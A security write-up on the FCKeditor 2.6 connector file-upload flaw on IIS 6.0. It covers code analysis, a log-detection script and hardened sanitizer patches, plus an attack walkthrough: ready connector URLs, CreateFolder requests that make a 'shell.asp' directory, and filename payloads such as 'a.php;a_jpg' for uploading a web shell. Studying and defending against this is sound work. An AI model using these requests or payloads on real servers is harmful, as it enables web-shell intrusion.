Fckeditor PHP/ASP File Upload Vul
Contents
. Vulnerability description
. Trigger conditions
. Affected versions
. Code analysis
. Defenses
. Offense and defense reflections
1. Vulnerability description
FCKeditor is one of the best-known WYSIWYG web editors. It is written in JavaScript, is feature-rich, easy to configure, cross-browser and open source, and ships server-side connectors for several languages. Because it is so widespread and its documentation is easy to find, a great many Chinese web projects and large sites have embedded it.
It can be combined with PHP, JavaScript, ASP, ASP.NET, ColdFusion, Java, ABAP and other server-side languages.
The file upload feature of FCK's file manager (the "connector") is a frequent target for GETSHELL attacks. The root causes are lax role and permission control on the connector and extension-filtering logic with a bypassable flaw; on IIS the two combine with the server's own path-parsing bugs.
Relevant Link:
http://sebug.net/vuldb/ssvid-20830
2. Trigger conditions
0x1: Information gathering
First collect the FCK version:
http://localhost/fckeditor/editor/dialog/fck_about.html
/*
version
2.6.8
Build 25427
*/
0x2: Locating the upload point
Leaking the physical path
Asking the connector for a folder that does not exist makes it error out and disclose the physical path:
http://172.31.200.74/editor/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp
Path disclosure
http://192.168.174.138/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp
Directory listing (also helps to find the upload directory)
http://192.168.174.138/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp
http://192.168.174.138/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
Other upload pages
http://192.168.174.138/fckeditor/_samples/default.html
http://192.168.174.138/fckeditor/_samples/asp/sample01.asp
http://192.168.174.138/fckeditor/_samples/asp/sample02.asp
http://192.168.174.138/fckeditor/_samples/asp/sample03.asp
http://192.168.174.138/fckeditor/_samples/asp/sample04.asp
Many sites have already deleted the _samples directory, but it is worth trying.
FCKeditor/editor/fckeditor.html cannot upload a file by itself, but clicking the image upload button and then "Browse Server" leads to a page that can.
http://192.168.174.138/fckeditor/editor/fckeditor.html
Commonly used upload addresses
http://192.168.174.138/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
http://192.168.174.138/fckeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
http://192.168.174.138/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php
Upload addresses of the test pages shipped with FCKeditor
http://192.168.174.138/fckeditor/editor/filemanager/browser/default/connectors/test.html
http://192.168.174.138/fckeditor/editor/filemanager/upload/test.html
http://192.168.174.138/fckeditor/editor/filemanager/connectors/test.html
http://192.168.174.138/fckeditor/editor/filemanager/connectors/uploadtest.html
The upload points finally obtained:
http://localhost/fckeditor/editor/filemanager/connectors/test.html
http://localhost/fckeditor/editor/filemanager/connectors/uploadtest.html
0x3: Creating a new folder
http://localhost/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
// creates a folder under the images folder
0x4: IIS parsing flaw
If a file sits inside a folder named xx.asp, IIS 6.0 executes every file under that folder as an ASP script. This is the well-known IIS xx.asp folder-name parsing flaw.
. Create the folder /shell.asp, then the sub-folder /shell.asp/z (the first request must be issued first)
http://localhost/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp
http://localhost/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
. Upload an xx.jpg whose content is a web shell
http://localhost/userfiles/image/shell.asp/z/choop.jpg
// this xx.jpg is parsed and executed as a web shell
0x5: Bypassing FCK's extension filter with the IIS parsing flaw
Normally FCK does have defensive logic for the extension of an uploaded file: script extensions are not on the allow list, and with ForceSingleExtension every dot except the last one is rewritten to "_".
. Upload file name: shell.php;.jpg
The first dot is rewritten, so the file is stored as shell_php;.jpg and the semicolon trick yields no script extension.
. If instead the upload file name is:
) a.php;a_jpg
) a.asp;a_jpg
the name contains a single dot, so nothing is rewritten. The extension after the last dot is "php;a_jpg"; the allow list is tested as an unanchored regex, finds "jpg" inside it and accepts the file. Because IIS 6.0 truncates the name at the semicolon, the stored file is, as far as IIS is concerned,
a.php
a.asp
and is executed.
Relevant Link:
http://hi.baidu.com/holyli/item/f2d37959513ed509e6c4a597
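The requests walked through in this section leave very recognisable traces in the web server log. The scanner below is an added example written for this write-up (it is not code from the original post or from FCKeditor): it parses IIS W3C extended log lines and flags the connector patterns described above, i.e. probes with a script-named CurrentFolder, CreateFolder with a script-extension folder name, directory traversal in CurrentFolder, server errors from the connector (path-disclosure probing) and hits on the leftover test pages. The log lines are constructed for the example; the field order assumes the default W3C fields date, time, s-ip, cs-method, cs-uri-stem, cs-uri-query, s-port, cs-username, c-ip, cs(User-Agent), sc-status, and the alert names are this example's own.

```python
"""Flag FCKeditor connector abuse in IIS W3C extended log lines (added example)."""
import re
from urllib.parse import parse_qs

# Script extensions that matter on IIS, followed by ';', end of value, or a path separator
SCRIPT_EXT = re.compile(
    r"\.(asp|aspx|cer|asa|cdx|php|php[345]|phtml|shtml|jsp|jspx|cfm)(;|$|/)", re.IGNORECASE)
# Both connector trees: /filemanager/connectors/ and /filemanager/browser/default/connectors/
CONNECTOR = re.compile(r"/filemanager/(?:browser/default/)?connectors/", re.IGNORECASE)
# The test pages the write-up lists under "upload addresses of the test pages"
TEST_PAGE = re.compile(
    r"/filemanager/(?:browser/default/)?(?:connectors/|upload/)?(?:uploadtest|test)\.html$",
    re.IGNORECASE)

# Assumed default W3C field order (adjust to the #Fields: line of a real log)
W3C_FIELDS = ["date", "time", "s-ip", "method", "uri", "query", "port",
              "user", "c-ip", "ua", "status"]

# Constructed sample log: one attacker (172.16.0.9) and two benign requests
SAMPLE_LOG = """#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2014-03-01 10:00:01 192.168.174.138 GET /fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp 80 - 172.16.0.9 Mozilla/5.0 500
2014-03-01 10:00:05 192.168.174.138 GET /fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp 80 - 172.16.0.9 Mozilla/5.0 200
2014-03-01 10:00:09 192.168.174.138 GET /fckeditor/editor/filemanager/connectors/asp/connector.asp Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684 80 - 172.16.0.9 Mozilla/5.0 200
2014-03-01 10:00:15 192.168.174.138 GET /fckeditor/editor/filemanager/connectors/uploadtest.html - 80 - 172.16.0.9 Mozilla/5.0 200
2014-03-01 10:01:00 192.168.174.138 GET /fckeditor/editor/filemanager/connectors/asp/connector.asp Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/ 80 - 10.0.0.5 Mozilla/5.0 200
2014-03-01 10:02:00 192.168.174.138 GET /index.asp - 80 - 10.0.0.7 Mozilla/5.0 200
"""


def parse_w3c(line):
    """Split one W3C line into a dict; None for directives (#...) and short lines."""
    if line.startswith("#"):
        return None
    parts = line.split()
    if len(parts) < len(W3C_FIELDS):
        return None
    rec = dict(zip(W3C_FIELDS, parts))
    rec["query"] = "" if rec["query"] == "-" else rec["query"]  # IIS logs "-" for no query
    return rec


def classify(rec):
    """Return the alert tags for one parsed request (empty list when nothing matches)."""
    tags = []
    uri, query = rec["uri"], rec["query"]
    if TEST_PAGE.search(uri):
        tags.append("fck-test-page")                    # leftover upload test form
    if not CONNECTOR.search(uri):
        return tags
    # parse_qs percent-decodes values, so %2F and ../ show up as plain characters
    params = {k.lower(): v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}
    cmd = params.get("command", "")
    folder = params.get("currentfolder", "")
    if cmd == "CreateFolder" and SCRIPT_EXT.search(params.get("newfoldername", "")):
        tags.append("fck-create-script-folder")        # xx.asp directory for IIS folder parsing
    if SCRIPT_EXT.search(folder):
        tags.append("fck-script-folder-in-path")       # CurrentFolder=/shell.asp probing or reuse
    if ".." in folder:
        tags.append("fck-folder-traversal")
    if rec["status"].startswith("5"):
        tags.append("fck-connector-error")             # path-disclosure probing
    return tags


def scan(log_text):
    """Run classify over a whole log; returns [(client_ip, uri, tags)] for flagged lines."""
    alerts = []
    for line in log_text.splitlines():
        rec = parse_w3c(line)
        if rec is None:
            continue
        tags = classify(rec)
        if tags:
            alerts.append((rec["c-ip"], rec["uri"], tags))
    return alerts


if __name__ == "__main__":
    for ip, uri, tags in scan(SAMPLE_LOG):
        print(ip, uri, ",".join(tags))
```

Run against a real log, the `#Fields:` directive should be used to build `W3C_FIELDS` instead of the hard-coded default, and the benign `GetFoldersAndFiles` on `/` is deliberately not flagged so that ordinary editor use does not drown the alerts.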
3. Affected versions
2.6.xx
4. Code analysis
FCKeditor's upload check decides which file types may and may not be uploaded with a deny list / allow list. The logic lives in
. asp: \editor\filemanager\connectors\asp\io.asp
. php: \editor\filemanager\connectors\php\io.php
// the browser directory holds a second copy of the same set of files with the same layout
. asp: \editor\filemanager\browser\default\connectors\asp\io.asp
. php: \editor\filemanager\browser\default\connectors\php\io.php
0x1: ASP
\fckeditor\editor\filemanager\connectors\asp\class_upload.asp
Private Function IsAllowed(sExt)
	Dim oRE
	Set oRE = New RegExp
	oRE.IgnoreCase = True
	oRE.Global = True

	If sDenied = "" Then
		oRE.Pattern = sAllowed
		IsAllowed = (sAllowed = "") Or oRE.Test(sExt)
	Else
		oRE.Pattern = sDenied
		IsAllowed = Not oRE.Test(sExt)
	End If

	Set oRE = Nothing
End Function
\fckeditor\editor\filemanager\connectors\asp\io.asp
Function IsAllowedExt( extension, resourceType )
	Dim oRE
	Set oRE = New RegExp
	oRE.IgnoreCase = True
	oRE.Global = True

	Dim sAllowed, sDenied
	sAllowed = ConfigAllowedExtensions.Item( resourceType )
	sDenied = ConfigDeniedExtensions.Item( resourceType )

	IsAllowedExt = True

	If sDenied <> "" Then
		oRE.Pattern = sDenied
		IsAllowedExt = Not oRE.Test( extension )
	End If

	If IsAllowedExt And sAllowed <> "" Then
		oRE.Pattern = sAllowed
		IsAllowedExt = oRE.Test( extension )
	End If

	Set oRE = Nothing
End Function
The allow/deny patterns that IsAllowedExt tests against come from FCK's configuration file config.asp; the extension itself is whatever follows the last dot of the (sanitized) upload name. Note that the patterns carry no "^" / "$" anchors, so RegExp.Test succeeds on any substring of the extension.
\fckeditor\editor\filemanager\connectors\asp\config.asp
ConfigAllowedExtensions.Add "File", "7z|aiff|asf|avi|bmp|csv|doc|fla|flv|gif|gz|gzip|jpeg|jpg|mid|mov|mp3|mp4|mpc|mpeg|mpg|ods|odt|pdf|png|ppt|pxd|qt|ram|rar|rm|rmi|rmvb|rtf|sdc|sitd|swf|sxc|sxw|tar|tgz|tif|tiff|txt|vsd|wav|wma|wmv|xls|xml|zip"
ConfigAllowedExtensions.Add "Image", "bmp|gif|jpeg|jpg|png"
ConfigAllowedExtensions.Add "Flash", "swf|flv"
ConfigAllowedExtensions.Add "Media", "aiff|asf|avi|bmp|fla|flv|gif|jpeg|jpg|mid|mov|mp3|mp4|mpc|mpeg|mpg|png|qt|ram|rm|rmi|rmvb|swf|tif|tiff|wav|wma|wmv"
These patterns only feed FCK's regex test; the actual renaming happens here:
\fckeditor\editor\filemanager\connectors\asp\io.asp
' Do a cleanup of the file name to avoid possible problems
function SanitizeFileName( sNewFileName )
	Dim oRegex
	Set oRegex = New RegExp
	oRegex.Global = True

	if ( ConfigForceSingleExtension = True ) then
		' This is the key renaming logic. The pattern matches every "." that is NOT
		' followed by a dot-free run to the end of the string: the negative lookahead
		' (?![^.]*$) fails only for the last dot, so every dot except the last one is
		' replaced by "_" and a single extension survives.
		' 1. "asp.asp;asp.jpg" has two dots; the first is rewritten, giving "asp_asp;asp.jpg".
		' 2. "asp.asp;jpg" has a single dot; nothing is rewritten, and the extension
		'    "asp;jpg" still passes the unanchored allow-list test, i.e. the filter is bypassed.
		oRegex.Pattern = "\.(?![^.]*$)"
		sNewFileName = oRegex.Replace( sNewFileName, "_" )
	end if

	' remove \ / | : ? * " < > and control characters (";" is not on the list)
	oRegex.Pattern = "(\\|\/|\||:|\?|\*|""|\<|\>|[\u0000-\u001F]|\u007F)"
	SanitizeFileName = oRegex.Replace( sNewFileName, "_" )

	Set oRegex = Nothing
end function
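To make the interplay of the three pieces analysed above concrete (SanitizeFileName with ForceSingleExtension, the extension taken after the last dot, and IsAllowedExt testing an unanchored allow-list regex), here is a Python model of the ASP pipeline written for this write-up. It is an added example, not FCKeditor's code: the regex patterns and the Image allow list are copied from the files quoted above, the function names and the one-line model of IIS 6.0's semicolon truncation are this example's own.

```python
"""Python model of the FCKeditor 2.6 ASP upload pipeline (added example, not project code)."""
import re

# config.asp allow list for Type=Image exactly as quoted above: no ^...$ anchors
ALLOWED_IMAGE = "bmp|gif|jpeg|jpg|png"
FORCE_SINGLE_EXTENSION = True


def sanitize_file_name(name, force_single_extension=FORCE_SINGLE_EXTENSION):
    """Port of io.asp SanitizeFileName: every dot but the last becomes "_", then forbidden chars."""
    if force_single_extension:
        name = re.sub(r"\.(?![^.]*$)", "_", name)
    # original character list: \ / | : ? * " < > and control characters; ';' is NOT included
    return re.sub(r'[\\/|:?*"<>\x00-\x1f\x7f]', "_", name)


def extension_of(name):
    """The connector takes everything after the last dot as the extension."""
    return name.rsplit(".", 1)[1] if "." in name else ""


def is_allowed_ext(ext, allowed=ALLOWED_IMAGE, denied=""):
    """Port of io.asp IsAllowedExt: RegExp.Test without anchors, case-insensitive."""
    ok = True
    if denied:
        ok = re.search(denied, ext, re.IGNORECASE) is None
    if ok and allowed:
        ok = re.search(allowed, ext, re.IGNORECASE) is not None
    return ok


def iis6_effective_name(stored_name):
    """Model of the IIS 6.0 flaw: the resource name is cut at the first ';'."""
    return stored_name.split(";", 1)[0]


def upload(name):
    """Simulate one FileUpload: (accepted, stored name, name IIS 6.0 would execute or None)."""
    stored = sanitize_file_name(name)
    accepted = is_allowed_ext(extension_of(stored))
    return accepted, stored, (iis6_effective_name(stored) if accepted else None)


if __name__ == "__main__":
    for payload in ["shell.php;.jpg", "a.php;a_jpg", "a.asp;a_jpg", "photo.jpg", "shell.asp"]:
        print(payload, "->", upload(payload))
```

Running it shows the two cases from section 2: "shell.php;.jpg" is accepted but stored as "shell_php;.jpg", which IIS sees as the extension-less "shell_php", while "a.php;a_jpg" survives sanitising untouched, is accepted because "jpg" occurs inside the extension "php;a_jpg", and reaches IIS as "a.php". A plain "shell.asp" is still rejected, which is why the bypass needs both the unanchored regex and the server-side truncation.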
5. Defenses
1. ASP
0x1: Delete the test html files under fckeditor
. \editor\filemanager\connectors\test.html
0x2: Defend against the IIS parsing flaw (semicolon truncation) in code
\editor\filemanager\connectors\asp\io.asp
' Do a cleanup of the file name to avoid possible problems
function SanitizeFileName( sNewFileName )
	Dim oRegex
	Dim oRegexSecurityExt
	Set oRegex = New RegExp
	Set oRegexSecurityExt = New RegExp
	oRegex.Global = True
	oRegexSecurityExt.Global = True
	' IIS file names are case-insensitive, so the extension check must be as well
	oRegexSecurityExt.IgnoreCase = True

	' Each step feeds the next through sNewFileName; assigning the intermediate results
	' to SanitizeFileName while reusing the original input would silently discard them.
	if ( ConfigForceSingleExtension = True ) then
		' keep only the last dot
		oRegex.Pattern = "\.(?![^.]*$)"
		sNewFileName = oRegex.Replace( sNewFileName, "_" )
		' neutralise a script extension that is terminated by ";" or by the end of the name
		oRegexSecurityExt.Pattern = "\.(asp|aspx|cer|asa|hdx|cdx|php|php5|php4|php3|phtml|shtml|jsp|jspx|xsp|cfm)(;|$)"
		sNewFileName = oRegexSecurityExt.Replace( sNewFileName, "_" )
	end if

	' remove \ / | : ; ? * " < > and control characters (";" added so IIS has nothing to truncate at)
	oRegex.Pattern = "(\\|\/|\||:|\;|\?|\*|""|\<|\>|[\u0000-\u001F]|\u007F)"
	SanitizeFileName = oRegex.Replace( sNewFileName, "_" )

	Set oRegex = Nothing
	Set oRegexSecurityExt = Nothing
end function
0x3: Defend against the IIS parsing flaw (creating an xx.asp directory) in code
If an attacker uses FCK's folder-creation command to create a directory named xx.asp, IIS parses every file under that directory as ASP, so a jpg containing a web shell uploaded into it is executed.
' Do a cleanup of the folder name to avoid possible problems
function SanitizeFolderName( sNewFolderName )
	Dim oRegex
	Dim oRegexSecurityExt
	Set oRegex = New RegExp
	Set oRegexSecurityExt = New RegExp
	oRegex.Global = True
	oRegexSecurityExt.Global = True
	oRegexSecurityExt.IgnoreCase = True

	' forbid a dangerous extension at the end of the folder name
	' (run first, while the dot is still present; results chain through sNewFolderName)
	oRegexSecurityExt.Pattern = "\.(asp|aspx|cer|asa|hdx|cdx|php|php5|php4|php3|phtml|shtml|jsp|jspx|xsp|cfm)$"
	sNewFolderName = oRegexSecurityExt.Replace( sNewFolderName, "_" )

	' remove . \ / | : ; ? * " < > and control characters;
	' with every dot removed a folder name can never end in a script extension
	oRegex.Pattern = "(\.|\\|\/|\||:|\?|\;|\*|""|\<|\>|[\u0000-\u001F]|\u007F)"
	SanitizeFolderName = oRegex.Replace( sNewFolderName, "_" )

	Set oRegex = Nothing
	Set oRegexSecurityExt = Nothing
end function
0x4: Regex bypass of the extension restriction
The fix is the same as 0x2 (semicolon truncation), and in addition the regex rule itself should be tightened: wrap the extension pattern in "^(" and ")$" so that a malformed suffix such as "php;a_jpg" can no longer satisfy the test by containing "jpg". The connector already does exactly this for the resource type and the command name:
Function IsAllowedType( resourceType )
	Dim oRE
	Set oRE = New RegExp
	oRE.IgnoreCase = False
	oRE.Global = True
	oRE.Pattern = "^(" & ConfigAllowedTypes & ")$"

	IsAllowedType = oRE.Test( resourceType )

	Set oRE = Nothing
End Function

Function IsAllowedCommand( sCommand )
	Dim oRE
	Set oRE = New RegExp
	oRE.IgnoreCase = True
	oRE.Global = True
	oRE.Pattern = "^(" & ConfigAllowedCommands & ")$"

	IsAllowedCommand = oRE.Test( sCommand )

	Set oRE = Nothing
End Function
Relevant Link:
http://www.chinaz.com/news/2012/1205/284700.shtml
http://www.sdlunzhong.cn/itres/showitnews.aspx?id=807
2. PHP
This applies where IIS runs PHP through FastCGI, i.e. where ASP and PHP coexist on the same IIS host and the semicolon and folder-name parsing flaws affect PHP uploads too.
/editor/filemanager/connectors/php/io.php
// Do a cleanup of the folder name to avoid possible problems
function SanitizeFolderName( $sNewFolderName )
{
	$sNewFolderName = stripslashes( $sNewFolderName ) ;

	// Forbid a folder name ending in a script extension (checked while the dot is still present)
	$sNewFolderName = preg_replace( '/\\.(asp|aspx|cer|asa|hdx|cdx|php|php5|php4|php3|phtml|shtml|jsp|jspx|xsp|cfm)$/i', '_', $sNewFolderName ) ;

	// Remove . \ ; / | : ? * " < > and control characters; with the dots gone no folder can end in .asp
	$sNewFolderName = preg_replace( '/\\.|\\\\|\\;|\\/|\\||\\:|\\?|\\*|"|<|>|[[:cntrl:]]/', '_', $sNewFolderName ) ;

	return $sNewFolderName ;
}

// Do a cleanup of the file name to avoid possible problems
function SanitizeFileName( $sNewFileName )
{
	global $Config ;

	$sNewFileName = stripslashes( $sNewFileName ) ;

	// Replace dots in the name with underscores (only one dot can be there... security issue).
	if ( $Config['ForceSingleExtension'] )
		$sNewFileName = preg_replace( '/\\.(?![^.]*$)/', '_', $sNewFileName ) ;

	// Neutralise a script extension terminated by ";" or by the end of the name (before ";" itself is stripped)
	$sNewFileName = preg_replace( '/\\.(asp|aspx|cer|asa|hdx|cdx|php|php5|php4|php3|phtml|shtml|jsp|jspx|xsp|cfm)(;|$)/i', '_', $sNewFileName ) ;

	// Remove \ / | : ; ? * " < > and control characters
	$sNewFileName = preg_replace( '/\\\\|\\/|\\||\\:|\\;|\\?|\\*|"|<|>|[[:cntrl:]]/', '_', $sNewFileName ) ;

	return $sNewFileName ;
}
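The hardened sanitizers of this section, run against the payloads from sections 2 and 4, as an added Python example written for this write-up (not FCKeditor's code): the regexes are the ones from the patched io.asp / io.php above, the function names, the anchored allow-list test from 0x4 and the small oracle for what IIS 6.0 would execute are this example's own. Three changes are combined: ";" joins the stripped characters, a script extension followed by ";" or by the end of the name is neutralised, and the allow list is tested anchored so that "php;a_jpg" can no longer match "jpg".

```python
"""Hardened file/folder name handling for the FCK connector, Python model (added example)."""
import re

SCRIPT_EXTS = "asp|aspx|cer|asa|hdx|cdx|php|php5|php4|php3|phtml|shtml|jsp|jspx|xsp|cfm"
ALLOWED_IMAGE = "bmp|gif|jpeg|jpg|png"


def sanitize_file_name_hardened(name, force_single_extension=True):
    """Patched SanitizeFileName: last dot only, kill ".asp;" / ".asp$", then strip ';' too."""
    if force_single_extension:
        name = re.sub(r"\.(?![^.]*$)", "_", name)
    # case-insensitive, because IIS file names are
    name = re.sub(rf"\.({SCRIPT_EXTS})(;|$)", "_", name, flags=re.IGNORECASE)
    return re.sub(r'[\\/|:;?*"<>\x00-\x1f\x7f]', "_", name)


def sanitize_folder_name_hardened(name):
    """Patched SanitizeFolderName: no script extension at the end, and no dot survives at all."""
    name = re.sub(rf"\.({SCRIPT_EXTS})$", "_", name, flags=re.IGNORECASE)
    return re.sub(r'[.\\/|:;?*"<>\x00-\x1f\x7f]', "_", name)


def extension_of(name):
    """Everything after the last dot, as the connector computes it."""
    return name.rsplit(".", 1)[1] if "." in name else ""


def is_allowed_ext_anchored(ext, allowed=ALLOWED_IMAGE):
    """Allow-list test with ^(...)$ anchors (0x4): the whole extension must be one of the entries."""
    return re.fullmatch(f"({allowed})", ext, re.IGNORECASE) is not None


def iis6_would_execute(stored_name):
    """Oracle: after IIS 6.0 cuts the name at ';', does it end in a script extension?"""
    effective = stored_name.split(";", 1)[0]
    return re.search(rf"\.({SCRIPT_EXTS})$", effective, re.IGNORECASE) is not None


def safe_upload(name):
    """Hardened FileUpload decision: (accepted, stored name)."""
    stored = sanitize_file_name_hardened(name)
    return is_allowed_ext_anchored(extension_of(stored)), stored


if __name__ == "__main__":
    for payload in ["a.php;a_jpg", "a.asp;a_jpg", "shell.php;.jpg", "SHELL.ASP", "photo.jpg"]:
        accepted, stored = safe_upload(payload)
        print(f"{payload:16} -> {stored:16} accepted={accepted} iis_exec={iis6_would_execute(stored)}")
    for folder in ["shell.asp", "shell.asp;x", "a.b.asp"]:
        print(f"folder {folder:12} -> {sanitize_folder_name_hardened(folder)}")
```

The order of the two file-name steps matters: the script-extension pattern must run while the ";" is still in the name, otherwise the "(;|$)" alternative never fires and "a.php;a_jpg" would reach the generic strip as "a.php_a_jpg". Even then the anchored allow list rejects it, which is the point of layering the fixes: each one alone closes only part of the bypass.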
6. Offense and defense reflections
Copyright (c) 2014 LittleHann All rights reserved